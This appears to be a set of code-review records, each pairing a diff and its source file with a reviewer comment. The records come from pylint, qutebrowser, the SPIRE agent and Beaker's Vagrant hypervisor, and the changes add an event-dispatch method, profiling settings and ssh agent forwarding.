num_args = num_args or manual_pos if positional_arguments or num_args: empty = any(True for field in named_fields if field == "") if named_arguments or empty: # Verify the required number of positional arguments # only if the .format got at least one keyword argument. # This means that the format strings accepts both # positional and named fields and we should warn # when one of the them is missing or is extra. check_args = True else: check_args = True if check_args: # num_args can be 0 if manual_pos is not. num_args = num_args or manual_pos if len(positional_arguments) > num_args: self.add_message("too-many-format-args", node=node) elif len(positional_arguments) < num_args: self.add_message("too-few-format-args", node=node) self._detect_vacuous_formatting(node, positional_arguments) self._check_new_format_specifiers(node, fields, named_arguments) def _check_new_format_specifiers(self, node, fields, named): """ Check attribute and index access in the format string ("{0.a}" and "{0[a]}"). """ for key, specifiers in fields: # Obtain the argument. If it can't be obtained # or inferred, skip this check. if key == "": # {[0]} will have an unnamed argument, defaulting # to 0. It will not be present in `named`, so use the value # 0 for it. key = 0 if isinstance(key, numbers.Number): try: argname = utils.get_argument_from_call(node, key) except utils.NoSuchArgumentError: continue else: if key not in named: continue argname = named[key] if argname in (astroid.Uninferable, None): continue try: argument = utils.safe_infer(argname) except astroid.InferenceError: continue if not specifiers or not argument: # No need to check this key if it doesn't # use attribute / item access continue if argument.parent and isinstance(argument.parent, astroid.Arguments): # Ignore any object coming from an argument, # because we can't infer its value properly. continue previous = argument parsed = [] for is_attribute, specifier in specifiers: if previous is astroid.Uninferable: break parsed.append((is_attribute, specifier)) if is_attribute: try: previous = previous.getattr(specifier)[0] except astroid.NotFoundError: if ( hasattr(previous, "has_dynamic_getattr") and previous.has_dynamic_getattr() ): # Don't warn if the object has a custom __getattr__ break path = get_access_path(key, parsed) self.add_message( "missing-format-attribute", args=(specifier, path), node=node, ) break else: warn_error = False if hasattr(previous, "getitem"): try: previous = previous.getitem(astroid.Const(specifier)) except ( astroid.AstroidIndexError, astroid.AstroidTypeError, astroid.AttributeInferenceError, ): warn_error = True except astroid.InferenceError: break if previous is astroid.Uninferable: break else: try: # Lookup __getitem__ in the current node, # but skip further checks, because we can't # retrieve the looked object previous.getattr("__getitem__") break except astroid.NotFoundError: warn_error = True if warn_error: path = get_access_path(key, parsed) self.add_message( "invalid-format-index", args=(specifier, path), node=node ) break try: previous = next(previous.infer()) except astroid.InferenceError: # can't check further if we can't infer it break class StringConstantChecker(BaseTokenChecker): """Check string literals""" __implements__ = (IAstroidChecker, ITokenChecker, IRawChecker) name = "string" msgs = { "W1401": ( "Anomalous backslash in string: '%s'. 
" "String constant might be missing an r prefix.", "anomalous-backslash-in-string", "Used when a backslash is in a literal string but not as an escape.", ), "W1402": ( "Anomalous Unicode escape in byte string: '%s'. " "String constant might be missing an r or u prefix.", "anomalous-unicode-escape-in-string", "Used when an escape like \\u is encountered in a byte " "string where it has no effect.", ), "W1404": ( "Implicit string concatenation found in %s", "implicit-str-concat", "String literals are implicitly concatenated in a " "literal iterable definition : " "maybe a comma is missing ?", {"old_names": [("W1403", "implicit-str-concat-in-sequence")]}, ), "W1405": ( "Quote delimiter %s is inconsistent with the rest of the file", "inconsistent-quotes", "Quote delimiters are not used consistently throughout a module " "(with allowances made for avoiding unnecessary escaping).", ), } options = ( ( "check-str-concat-over-line-jumps", { "default": False, "type": "yn", "metavar": "<y_or_n>", "help": "This flag controls whether the " "implicit-str-concat should generate a warning " "on implicit string concatenation in sequences defined over " "several lines.", }, ), ( "check-quote-consistency", { "default": False, "type": "yn", "metavar": "<y_or_n>", "help": "This flag controls whether inconsistent-quotes generates a " "warning when the character used as a quote delimiter is used " "inconsistently within a module.", }, ), ) # Characters that have a special meaning after a backslash in either # Unicode or byte strings. ESCAPE_CHARACTERS = "abfnrtvx\n\r\t\\'\"01234567" # Characters that have a special meaning after a backslash but only in # Unicode strings. UNICODE_ESCAPE_CHARACTERS = "uUN" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.string_tokens = {} # token position -> (token value, next token) def process_module(self, module): self._unicode_literals = "unicode_literals" in module.future_imports def process_tokens(self, tokens): encoding = "ascii" for i, (tok_type, token, start, _, line) in enumerate(tokens): if tok_type == tokenize.ENCODING: # this is always the first token processed encoding = token elif tok_type == tokenize.STRING: # 'token' is the whole un-parsed token; we can look at the start # of it to see whether it's a raw or unicode string etc. 
self.process_string_token(token, start[0], start[1]) # We figure the next token, ignoring comments & newlines: j = i + 1 while j < len(tokens) and tokens[j].type in ( tokenize.NEWLINE, tokenize.NL, tokenize.COMMENT, ): j += 1 next_token = tokens[j] if j < len(tokens) else None if encoding != "ascii": # We convert `tokenize` character count into a byte count, # to match with astroid `.col_offset` start = (start[0], len(line[: start[1]].encode(encoding))) self.string_tokens[start] = (str_eval(token), next_token) if self.config.check_quote_consistency: self.check_for_consistent_string_delimiters(tokens) @check_messages("implicit-str-concat") def visit_list(self, node): self.check_for_concatenated_strings(node.elts, "list") @check_messages("implicit-str-concat") def visit_set(self, node): self.check_for_concatenated_strings(node.elts, "set") @check_messages("implicit-str-concat") def visit_tuple(self, node): self.check_for_concatenated_strings(node.elts, "tuple") def visit_assign(self, node): if isinstance(node.value, astroid.Const) and isinstance(node.value.value, str): self.check_for_concatenated_strings([node.value], "assignment") def check_for_consistent_string_delimiters( self, tokens: Iterable[tokenize.TokenInfo] ) -> None: """Adds a message for each string using inconsistent quote delimiters. Quote delimiters are used inconsistently if " and ' are mixed in a module's shortstrings without having done so to avoid escaping an internal quote character. Args: tokens: The tokens to be checked against for consistent usage. """ # typing.Counter added in Python 3.6.1 so this type hint must be a comment string_delimiters = collections.Counter() # type: Counter[str] # First, figure out which quote character predominates in the module for tok_type, token, _, _, _ in tokens: if tok_type == tokenize.STRING and _is_quote_delimiter_chosen_freely(token): string_delimiters[_get_quote_delimiter(token)] += 1 if len(string_delimiters) > 1: # Ties are broken arbitrarily most_common_delimiter = string_delimiters.most_common(1)[0][0] for tok_type, token, start, _, _ in tokens: if tok_type != tokenize.STRING: continue quote_delimiter = _get_quote_delimiter(token) if ( _is_quote_delimiter_chosen_freely(token) and quote_delimiter != most_common_delimiter ): self.add_message( "inconsistent-quotes", line=start[0], args=(quote_delimiter,) ) def check_for_concatenated_strings(self, elements, iterable_type): for elt in elements: if not ( isinstance(elt, astroid.Const) and elt.pytype() in _AST_NODE_STR_TYPES ): continue if elt.col_offset < 0: # This can happen in case of escaped newlines continue if (elt.lineno, elt.col_offset) not in self.string_tokens: # This may happen with Latin1 encoding # cf. https://github.com/PyCQA/pylint/issues/2610 continue matching_token, next_token = self.string_tokens[ (elt.lineno, elt.col_offset) ] # We detect string concatenation: the AST Const is the # combination of 2 string tokens if matching_token != elt.value and next_token is not None: if next_token.type == tokenize.STRING and ( next_token.start[0] == elt.lineno or self.config.check_str_concat_over_line_jumps ): self.add_message( "implicit-str-concat", line=elt.lineno, args=(iterable_type,) ) def process_string_token(self, token, start_row, start_col): quote_char = None index = None for index, char in enumerate(token): if char in "'\"": quote_char = char break if quote_char is None: return prefix = token[:index].lower() # markers like u, b, r. 
after_prefix = token[index:] # Chop off quotes quote_length = ( 3 if after_prefix[:3] == after_prefix[-3:] == 3 * quote_char else 1 ) string_body = after_prefix[quote_length:-quote_length] # No special checks on raw strings at the moment. if "r" not in prefix: self.process_non_raw_string_token( prefix, string_body, start_row, start_col + len(prefix) + quote_length, ) def process_non_raw_string_token( self, prefix, string_body, start_row, string_start_col ): """check for bad escapes in a non-raw string. prefix: lowercase string of eg 'ur' string prefix markers. string_body: the un-parsed body of the string, not including the quote marks. start_row: integer line number in the source. string_start_col: integer col number of the string start in the source. """ # Walk through the string; if we see a backslash then escape the next # character, and skip over it. If we see a non-escaped character, # alert, and continue. # # Accept a backslash when it escapes a backslash, or a quote, or # end-of-line, or one of the letters that introduce a special escape # sequence <https://docs.python.org/reference/lexical_analysis.html> # index = 0 while True: index = string_body.find("\\", index) if index == -1: break # There must be a next character; having a backslash at the end # of the string would be a SyntaxError. next_char = string_body[index + 1] match = string_body[index : index + 2] # The column offset will vary depending on whether the string token # is broken across lines. Calculate relative to the nearest line # break or relative to the start of the token's line. last_newline = string_body.rfind("\n", 0, index) if last_newline == -1: line = start_row col_offset = index + string_start_col else: line = start_row + string_body.count("\n", 0, index) col_offset = index - last_newline - 1 if next_char in self.UNICODE_ESCAPE_CHARACTERS: if "u" in prefix: pass elif "b" not in prefix: pass # unicode by default else: self.add_message( "anomalous-unicode-escape-in-string", line=line, args=(match,), col_offset=col_offset, ) elif next_char not in self.ESCAPE_CHARACTERS: self.add_message( "anomalous-backslash-in-string", line=line, args=(match,), col_offset=col_offset, ) # Whether it was a valid escape or not, backslash followed by # another character can always be consumed whole: the second # character can never be the start of a new backslash escape. index += 2 def register(linter): """required method to auto register this checker""" linter.register_checker(StringFormatChecker(linter)) linter.register_checker(StringConstantChecker(linter)) def str_eval(token): """ Mostly replicate `ast.literal_eval(token)` manually to avoid any performance hit. This supports f-strings, contrary to `ast.literal_eval`. We have to support all string literal notations: https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals """ if token[0:2].lower() in ("fr", "rf"): token = token[2:] elif token[0].lower() in ("r", "u", "f"): token = token[1:] if token[0:3] in ('"""', "'''"): return token[3:-3] return token[1:-1] def _is_long_string(string_token: str) -> bool: """Is this string token a "longstring" (is it triple-quoted)? Long strings are triple-quoted as defined in https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals This function only checks characters up through the open quotes. Because it's meant to be applied only to tokens that represent string literals, it doesn't bother to check for close-quotes (demonstrating that the literal is a well-formed string). 
Args: string_token: The string token to be parsed. Returns: A boolean representing whether or not this token matches a longstring regex. """ return bool( SINGLE_QUOTED_REGEX.match(string_token) or DOUBLE_QUOTED_REGEX.match(string_token) ) def _get_quote_delimiter(string_token: str) -> str: """Returns the quote character used to delimit this token string. This function does little checking for whether the token is a well-formed string. Args: string_token: The token to be parsed. Returns: A string containing solely the first quote delimiter character in the passed string. Raises: ValueError: No quote delimiter characters are present. """ match = QUOTE_DELIMITER_REGEX.match(string_token) if not match: raise ValueError("string token %s is not a well-formed string" % string_token) return match.group(2) def _is_quote_delimiter_chosen_freely(string_token: str) -> bool: """Was there a non-awkward option for the quote delimiter? Args: string_token: The quoted string whose delimiters are to be checked. Returns: Whether there was a choice in this token's quote character that would not have involved backslash-escaping an interior quote character. Long strings are excepted from this analysis under the assumption that their quote characters are set by policy. """ quote_delimiter = _get_quote_delimiter(string_token) unchosen_delimiter = '"' if quote_delimiter == "'" else "'" return bool( quote_delimiter and not _is_long_string(string_token) and unchosen_delimiter not in str_eval(string_token) )
1
14,958
This is done automatically, you can skip it next time ;)
PyCQA-pylint
py
@@ -128,6 +128,14 @@ class WebKitElement(webelem.AbstractWebElement):
         value = javascript.string_escape(value)
         self._elem.evaluateJavaScript("this.value='{}'".format(value))

+    def dispatch_event(self, event):
+        self._check_vanished()
+        if self._tab.is_deleted():
+            raise webelem.OrphanedError("Tab containing element vanished")
+        log.webelem.debug("Firing event on {!r} via javascript.".format(self))
+        self._elem.evaluateJavaScript("this.dispatchEvent(new Event('{}'))"
+                                      .format(event))
+
     def caret_position(self):
         """Get the text caret position for the current element."""
         self._check_vanished()
1
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: # Copyright 2014-2018 Florian Bruhin (The Compiler) <[email protected]> # # This file is part of qutebrowser. # # qutebrowser is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # qutebrowser is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with qutebrowser. If not, see <http://www.gnu.org/licenses/>. """QtWebKit specific part of the web element API.""" from PyQt5.QtCore import QRect from PyQt5.QtWebKit import QWebElement, QWebSettings from qutebrowser.config import config from qutebrowser.utils import log, utils, javascript from qutebrowser.browser import webelem class IsNullError(webelem.Error): """Gets raised by WebKitElement if an element is null.""" pass class WebKitElement(webelem.AbstractWebElement): """A wrapper around a QWebElement.""" def __init__(self, elem, tab): super().__init__(tab) if isinstance(elem, self.__class__): raise TypeError("Trying to wrap a wrapper!") if elem.isNull(): raise IsNullError('{} is a null element!'.format(elem)) self._elem = elem def __str__(self): self._check_vanished() return self._elem.toPlainText() def __eq__(self, other): if not isinstance(other, WebKitElement): return NotImplemented return self._elem == other._elem # pylint: disable=protected-access def __getitem__(self, key): self._check_vanished() if key not in self: raise KeyError(key) return self._elem.attribute(key) def __setitem__(self, key, val): self._check_vanished() self._elem.setAttribute(key, val) def __delitem__(self, key): self._check_vanished() if key not in self: raise KeyError(key) self._elem.removeAttribute(key) def __contains__(self, key): self._check_vanished() return self._elem.hasAttribute(key) def __iter__(self): self._check_vanished() yield from self._elem.attributeNames() def __len__(self): self._check_vanished() return len(self._elem.attributeNames()) def _check_vanished(self): """Raise an exception if the element vanished (is null).""" if self._elem.isNull(): raise IsNullError('Element {} vanished!'.format(self._elem)) def has_frame(self): self._check_vanished() return self._elem.webFrame() is not None def geometry(self): self._check_vanished() return self._elem.geometry() def classes(self): self._check_vanished() return self._elem.classes() def tag_name(self): """Get the tag name for the current element.""" self._check_vanished() return self._elem.tagName().lower() def outer_xml(self): """Get the full HTML representation of this element.""" self._check_vanished() return self._elem.toOuterXml() def value(self): self._check_vanished() val = self._elem.evaluateJavaScript('this.value') assert isinstance(val, (int, float, str, type(None))), val return val def set_value(self, value): self._check_vanished() if self._tab.is_deleted(): raise webelem.OrphanedError("Tab containing element vanished") if self.is_content_editable(): log.webelem.debug("Filling {!r} via set_text.".format(self)) self._elem.setPlainText(value) else: log.webelem.debug("Filling {!r} via javascript.".format(self)) value = javascript.string_escape(value) self._elem.evaluateJavaScript("this.value='{}'".format(value)) def 
caret_position(self): """Get the text caret position for the current element.""" self._check_vanished() pos = self._elem.evaluateJavaScript('this.selectionStart') if pos is None: return 0 return int(pos) def insert_text(self, text): self._check_vanished() if not self.is_editable(strict=True): raise webelem.Error("Element is not editable!") log.webelem.debug("Inserting text into element {!r}".format(self)) self._elem.evaluateJavaScript(""" var text = "{}"; var event = document.createEvent("TextEvent"); event.initTextEvent("textInput", true, true, null, text); this.dispatchEvent(event); """.format(javascript.string_escape(text))) def _parent(self): """Get the parent element of this element.""" self._check_vanished() elem = self._elem.parent() if elem is None or elem.isNull(): return None return WebKitElement(elem, tab=self._tab) def _rect_on_view_js(self): """Javascript implementation for rect_on_view.""" # FIXME:qtwebengine maybe we can reuse this? rects = self._elem.evaluateJavaScript("this.getClientRects()") if rects is None: # pragma: no cover # On e.g. Void Linux with musl libc, the stack size is too small # for jsc, and running JS will fail. If that happens, fall back to # the Python implementation. # https://github.com/qutebrowser/qutebrowser/issues/1641 return None text = utils.compact_text(self._elem.toOuterXml(), 500) log.webelem.vdebug("Client rectangles of element '{}': {}".format( text, rects)) for i in range(int(rects.get("length", 0))): rect = rects[str(i)] width = rect.get("width", 0) height = rect.get("height", 0) if width > 1 and height > 1: # fix coordinates according to zoom level zoom = self._elem.webFrame().zoomFactor() if not config.val.zoom.text_only: rect["left"] *= zoom rect["top"] *= zoom width *= zoom height *= zoom rect = QRect(rect["left"], rect["top"], width, height) frame = self._elem.webFrame() while frame is not None: # Translate to parent frames' position (scroll position # is taken care of inside getClientRects) rect.translate(frame.geometry().topLeft()) frame = frame.parentFrame() return rect return None def _rect_on_view_python(self, elem_geometry): """Python implementation for rect_on_view.""" if elem_geometry is None: geometry = self._elem.geometry() else: geometry = elem_geometry frame = self._elem.webFrame() rect = QRect(geometry) while frame is not None: rect.translate(frame.geometry().topLeft()) rect.translate(frame.scrollPosition() * -1) frame = frame.parentFrame() return rect def rect_on_view(self, *, elem_geometry=None, no_js=False): """Get the geometry of the element relative to the webview. Uses the getClientRects() JavaScript method to obtain the collection of rectangles containing the element and returns the first rectangle which is large enough (larger than 1px times 1px). If all rectangles returned by getClientRects() are too small, falls back to elem.rect_on_view(). Skipping of small rectangles is due to <a> elements containing other elements with "display:block" style, see https://github.com/qutebrowser/qutebrowser/issues/1298 Args: elem_geometry: The geometry of the element, or None. Calling QWebElement::geometry is rather expensive so we want to avoid doing it twice. 
no_js: Fall back to the Python implementation """ self._check_vanished() # First try getting the element rect via JS, as that's usually more # accurate if elem_geometry is None and not no_js: rect = self._rect_on_view_js() if rect is not None: return rect # No suitable rects found via JS, try via the QWebElement API return self._rect_on_view_python(elem_geometry) def _is_visible(self, mainframe): """Check if the given element is visible in the given frame. This is not public API because it can't be implemented easily here with QtWebEngine, and is only used via find_css(..., only_visible=True) via the tab API. """ self._check_vanished() # CSS attributes which hide an element hidden_attributes = { 'visibility': 'hidden', 'display': 'none', 'opacity': '0', } for k, v in hidden_attributes.items(): if (self._elem.styleProperty(k, QWebElement.ComputedStyle) == v and 'ace_text-input' not in self.classes()): return False elem_geometry = self._elem.geometry() if not elem_geometry.isValid() and elem_geometry.x() == 0: # Most likely an invisible link return False # First check if the element is visible on screen elem_rect = self.rect_on_view(elem_geometry=elem_geometry) mainframe_geometry = mainframe.geometry() if elem_rect.isValid(): visible_on_screen = mainframe_geometry.intersects(elem_rect) else: # We got an invalid rectangle (width/height 0/0 probably), but this # can still be a valid link. visible_on_screen = mainframe_geometry.contains( elem_rect.topLeft()) # Then check if it's visible in its frame if it's not in the main # frame. elem_frame = self._elem.webFrame() framegeom = QRect(elem_frame.geometry()) if not framegeom.isValid(): visible_in_frame = False elif elem_frame.parentFrame() is not None: framegeom.moveTo(0, 0) framegeom.translate(elem_frame.scrollPosition()) if elem_geometry.isValid(): visible_in_frame = framegeom.intersects(elem_geometry) else: # We got an invalid rectangle (width/height 0/0 probably), but # this can still be a valid link. visible_in_frame = framegeom.contains(elem_geometry.topLeft()) else: visible_in_frame = visible_on_screen return all([visible_on_screen, visible_in_frame]) def remove_blank_target(self): elem = self for _ in range(5): if elem is None: break if elem.is_link(): if elem.get('target', None) == '_blank': elem['target'] = '_top' break elem = elem._parent() # pylint: disable=protected-access def _move_text_cursor(self): if self.is_text_input() and self.is_editable(): self._tab.caret.move_to_end_of_document() def _requires_user_interaction(self): return False def _click_editable(self, click_target): ok = self._elem.evaluateJavaScript('this.focus(); true;') if ok: self._move_text_cursor() else: log.webelem.debug("Failed to focus via JS, falling back to event") self._click_fake_event(click_target) def _click_js(self, click_target): settings = QWebSettings.globalSettings() attribute = QWebSettings.JavascriptCanOpenWindows could_open_windows = settings.testAttribute(attribute) settings.setAttribute(attribute, True) ok = self._elem.evaluateJavaScript('this.click(); true;') settings.setAttribute(attribute, could_open_windows) if not ok: log.webelem.debug("Failed to click via JS, falling back to event") self._click_fake_event(click_target) def _click_fake_event(self, click_target): self._tab.data.override_target = click_target super()._click_fake_event(click_target) def get_child_frames(startframe): """Get all children recursively of a given QWebFrame. Loosely based on http://blog.nextgenetics.net/?e=64 Args: startframe: The QWebFrame to start with. 
Return: A list of children QWebFrame, or an empty list. """ results = [] frames = [startframe] while frames: new_frames = [] for frame in frames: results.append(frame) new_frames += frame.childFrames() frames = new_frames return results
1
22,198
This is needed in `set_value` because of `:open-editor` (you could open an editor, close the tab, then close the editor). I don't think it makes any sense to have it here?
qutebrowser-qutebrowser
py
@@ -53,6 +53,10 @@ type agentConfig struct { ConfigPath string Umask string `hcl:"umask"` + + ProfilingEnabled string `hcl:"profiling_enabled"` + ProfilingPort string `hcl:"profiling_port"` + ProfilingFreq string `hcl:"profiling_freq"` } type RunCLI struct {
1
package run import ( "crypto/x509" "encoding/pem" "errors" "flag" "fmt" "io/ioutil" "net" "net/url" "os" "os/signal" "path/filepath" "strconv" "syscall" "github.com/hashicorp/hcl" "github.com/spiffe/spire/pkg/agent" "github.com/spiffe/spire/pkg/common/catalog" "github.com/spiffe/spire/pkg/common/log" ) const ( defaultConfigPath = "conf/agent/agent.conf" defaultSocketPath = "./spire_api" // TODO: Make my defaults sane defaultDataDir = "." defaultLogLevel = "INFO" defaultUmask = 0077 ) // RunConfig represents the available configurables for file // and CLI options type runConfig struct { AgentConfig agentConfig `hcl:"agent"` PluginConfigs catalog.PluginConfigMap `hcl:"plugins"` } type agentConfig struct { ServerAddress string `hcl:"server_address"` ServerPort int `hcl:"server_port"` TrustDomain string `hcl:"trust_domain"` TrustBundlePath string `hcl:"trust_bundle_path"` JoinToken string `hcl:"join_token"` SocketPath string `hcl:"socket_path"` DataDir string `hcl:"data_dir"` LogFile string `hcl:"log_file"` LogLevel string `hcl:"log_level"` ConfigPath string Umask string `hcl:"umask"` } type RunCLI struct { } func (*RunCLI) Help() string { _, err := parseFlags([]string{"-h"}) return err.Error() } func (*RunCLI) Run(args []string) int { cliConfig, err := parseFlags(args) if err != nil { fmt.Println(err.Error()) return 1 } fileConfig, err := parseFile(cliConfig.AgentConfig.ConfigPath) if err != nil { fmt.Println(err.Error()) return 1 } c := newDefaultConfig() // Get the plugin configurations from the file c.PluginConfigs = fileConfig.PluginConfigs err = mergeConfigs(c, fileConfig, cliConfig) if err != nil { fmt.Println(err.Error()) } err = validateConfig(c) if err != nil { fmt.Println(err.Error()) } agt := agent.New(c) signalListener(agt) err = agt.Run() if err != nil { c.Log.Errorf("agent crashed: %v", err) return 1 } c.Log.Infof("Agent stopped gracefully") return 0 } func (*RunCLI) Synopsis() string { return "Runs the agent" } func parseFile(filePath string) (*runConfig, error) { c := &runConfig{} // Return a friendly error if the file is missing if _, err := os.Stat(filePath); os.IsNotExist(err) { msg := "could not find config file %s: please use the -config flag" p, err := filepath.Abs(filePath) if err != nil { p = filePath msg = "could not determine CWD; config file not found at %s: use -config" } return nil, fmt.Errorf(msg, p) } data, err := ioutil.ReadFile(filePath) if err != nil { return nil, err } hclTree, err := hcl.Parse(string(data)) if err != nil { return nil, err } if err := hcl.DecodeObject(&c, hclTree); err != nil { return nil, err } return c, nil } func parseFlags(args []string) (*runConfig, error) { flags := flag.NewFlagSet("run", flag.ContinueOnError) c := &runConfig{} flags.StringVar(&c.AgentConfig.ServerAddress, "serverAddress", "", "IP address or DNS name of the SPIRE server") flags.IntVar(&c.AgentConfig.ServerPort, "serverPort", 0, "Port number of the SPIRE server") flags.StringVar(&c.AgentConfig.TrustDomain, "trustDomain", "", "The trust domain that this agent belongs to") flags.StringVar(&c.AgentConfig.TrustBundlePath, "trustBundle", "", "Path to the SPIRE server CA bundle") flags.StringVar(&c.AgentConfig.JoinToken, "joinToken", "", "An optional token which has been generated by the SPIRE server") flags.StringVar(&c.AgentConfig.SocketPath, "socketPath", "", "Location to bind the workload API socket") flags.StringVar(&c.AgentConfig.DataDir, "dataDir", "", "A directory the agent can use for its runtime data") flags.StringVar(&c.AgentConfig.LogFile, "logFile", "", "File to 
write logs to") flags.StringVar(&c.AgentConfig.LogLevel, "logLevel", "", "DEBUG, INFO, WARN or ERROR") flags.StringVar(&c.AgentConfig.ConfigPath, "config", defaultConfigPath, "Path to a SPIRE config file") flags.StringVar(&c.AgentConfig.Umask, "umask", "", "Umask value to use for new files") err := flags.Parse(args) if err != nil { return nil, err } return c, nil } func mergeConfigs(c *agent.Config, fileConfig, cliConfig *runConfig) error { // CLI > File, merge fileConfig first err := mergeConfig(c, fileConfig) if err != nil { return err } return mergeConfig(c, cliConfig) } func mergeConfig(orig *agent.Config, cmd *runConfig) error { // Parse server address if cmd.AgentConfig.ServerAddress != "" { ips, err := net.LookupIP(cmd.AgentConfig.ServerAddress) if err != nil { return err } if len(ips) == 0 { return fmt.Errorf("Could not resolve ServerAddress %s", cmd.AgentConfig.ServerAddress) } serverAddress := ips[0] orig.ServerAddress.IP = serverAddress } if cmd.AgentConfig.ServerPort != 0 { orig.ServerAddress.Port = cmd.AgentConfig.ServerPort } if cmd.AgentConfig.TrustDomain != "" { trustDomain := url.URL{ Scheme: "spiffe", Host: cmd.AgentConfig.TrustDomain, } orig.TrustDomain = trustDomain } // Parse trust bundle if cmd.AgentConfig.TrustBundlePath != "" { bundle, err := parseTrustBundle(cmd.AgentConfig.TrustBundlePath) if err != nil { return fmt.Errorf("Error parsing trust bundle: %s", err) } orig.TrustBundle = bundle } if cmd.AgentConfig.JoinToken != "" { orig.JoinToken = cmd.AgentConfig.JoinToken } if cmd.AgentConfig.SocketPath != "" { orig.BindAddress.Name = cmd.AgentConfig.SocketPath } if cmd.AgentConfig.DataDir != "" { orig.DataDir = cmd.AgentConfig.DataDir } // Handle log file and level if cmd.AgentConfig.LogFile != "" || cmd.AgentConfig.LogLevel != "" { logLevel := defaultLogLevel if cmd.AgentConfig.LogLevel != "" { logLevel = cmd.AgentConfig.LogLevel } logger, err := log.NewLogger(logLevel, cmd.AgentConfig.LogFile) if err != nil { return fmt.Errorf("Could not open log file %s: %s", cmd.AgentConfig.LogFile, err) } orig.Log = logger } if cmd.AgentConfig.Umask != "" { umask, err := strconv.ParseInt(cmd.AgentConfig.Umask, 0, 0) if err != nil { return fmt.Errorf("Could not parse umask %s: %s", cmd.AgentConfig.Umask, err) } orig.Umask = int(umask) } return nil } func validateConfig(c *agent.Config) error { if c.ServerAddress.IP == nil || c.ServerAddress.Port == 0 { return errors.New("ServerAddress and ServerPort are required") } if c.TrustDomain.String() == "" { return errors.New("TrustDomain is required") } if c.TrustBundle == nil { return errors.New("TrustBundle is required") } return nil } func newDefaultConfig() *agent.Config { bindAddr := &net.UnixAddr{Name: defaultSocketPath, Net: "unix"} // log.NewLogger() cannot return error when using STDOUT logger, _ := log.NewLogger(defaultLogLevel, "") serverAddress := &net.TCPAddr{} return &agent.Config{ BindAddress: bindAddr, DataDir: defaultDataDir, Log: logger, ServerAddress: serverAddress, Umask: defaultUmask, } } func parseTrustBundle(path string) ([]*x509.Certificate, error) { pemData, err := ioutil.ReadFile(path) if err != nil { return nil, err } var data []byte for len(pemData) > 1 { var block *pem.Block block, pemData = pem.Decode(pemData) if block == nil && len(data) < 1 { return nil, errors.New("no certificates found") } if block == nil { return nil, errors.New("encountered unknown data in trust bundle") } if block.Type != "CERTIFICATE" { return nil, fmt.Errorf("non-certificate type %v found in trust bundle", block.Type) } data = 
append(data, block.Bytes...) } bundle, err := x509.ParseCertificates(data) if err != nil { return nil, fmt.Errorf("parse certificates from %v, %v", path, err) } return bundle, nil } func stringDefault(option string, defaultValue string) string { if option == "" { return defaultValue } return option } func signalListener(agt *agent.Agent) { go func() { signalCh := make(chan os.Signal, 1) signal.Notify(signalCh, syscall.SIGINT, syscall.SIGTERM) select { case <-signalCh: agt.Shutdown() } }() return }
1
9,152
Perhaps we can assume that profiling is enabled if ProfilingPort is set? And/or configure a default port and frequency, so we don't have to set three config vars every time?
spiffe-spire
go
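One way to read the review comment above, sketched in Go: treat a set profiling_port as the "on" switch and fall back to defaults for anything not given, so the operator never has to set all three HCL values. The function name, the default values, and the string comparison for profiling_enabled are illustrative assumptions, not part of the actual SPIRE change.

package run

import (
	"fmt"
	"strconv"
)

// Illustrative defaults; these are assumptions, not values SPIRE defines.
const (
	defaultProfilingPort = "6060"
	defaultProfilingFreq = "30"
)

// resolveProfiling reads the reviewer's suggestion literally: a non-empty
// profiling_port (or an explicit profiling_enabled) means profiling is on,
// and the port/frequency fall back to assumed defaults.
func resolveProfiling(enabled, port, freq string) (on bool, portNum, freqSec int, err error) {
	// The config fields are raw strings in the patch, so "true" is compared
	// literally here; a real implementation would parse the bool properly.
	if port == "" && enabled != "true" {
		return false, 0, 0, nil
	}
	if port == "" {
		port = defaultProfilingPort
	}
	if freq == "" {
		freq = defaultProfilingFreq
	}
	portNum, err = strconv.Atoi(port)
	if err != nil {
		return false, 0, 0, fmt.Errorf("could not parse profiling_port %q: %v", port, err)
	}
	freqSec, err = strconv.Atoi(freq)
	if err != nil {
		return false, 0, 0, fmt.Errorf("could not parse profiling_freq %q: %v", freq, err)
	}
	return true, portNum, freqSec, nil
}

mergeConfig could then call this once instead of copying three raw strings around; whether profiling_enabled is kept as an explicit override or dropped entirely is a separate choice.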
@@ -22,6 +22,7 @@ module Beaker #HACK HACK HACK - add checks here to ensure that we have box + box_url #generate the VagrantFile v_file = "Vagrant.configure(\"2\") do |c|\n" + v_file << " c.ssh.forward_agent = true\n" unless options['forward_ssh_agent'].nil? hosts.each do |host| host['ip'] ||= randip #use the existing ip, otherwise default to a random ip v_file << " c.vm.define '#{host.name}' do |v|\n"
1
require 'open3' module Beaker class Vagrant < Beaker::Hypervisor # Return a random mac address # # @return [String] a random mac address def randmac "080027" + (1..3).map{"%0.2X"%rand(256)}.join end def rand_chunk (2 + rand(252)).to_s #don't want a 0, 1, or a 255 end def randip "10.255.#{rand_chunk}.#{rand_chunk}" end def make_vfile hosts, options = {} #HACK HACK HACK - add checks here to ensure that we have box + box_url #generate the VagrantFile v_file = "Vagrant.configure(\"2\") do |c|\n" hosts.each do |host| host['ip'] ||= randip #use the existing ip, otherwise default to a random ip v_file << " c.vm.define '#{host.name}' do |v|\n" v_file << " v.vm.hostname = '#{host.name}'\n" v_file << " v.vm.box = '#{host['box']}'\n" v_file << " v.vm.box_url = '#{host['box_url']}'\n" unless host['box_url'].nil? v_file << " v.vm.box_version = '#{host['box_version']}'\n" unless host['box_version'].nil? v_file << " v.vm.box_check_update = '#{host['box_check_update'] ||= 'true'}'\n" v_file << " v.vm.network :private_network, ip: \"#{host['ip'].to_s}\", :netmask => \"#{host['netmask'] ||= "255.255.0.0"}\", :mac => \"#{randmac}\"\n" if /windows/i.match(host['platform']) v_file << " v.vm.network :forwarded_port, guest: 3389, host: 3389\n" v_file << " v.vm.network :forwarded_port, guest: 5985, host: 5985, id: 'winrm', auto_correct: true\n" v_file << " v.vm.guest = :windows" end v_file << self.class.provider_vfile_section(host, options) v_file << " end\n" @logger.debug "created Vagrantfile for VagrantHost #{host.name}" end v_file << "end\n" File.open(@vagrant_file, 'w') do |f| f.write(v_file) end end def 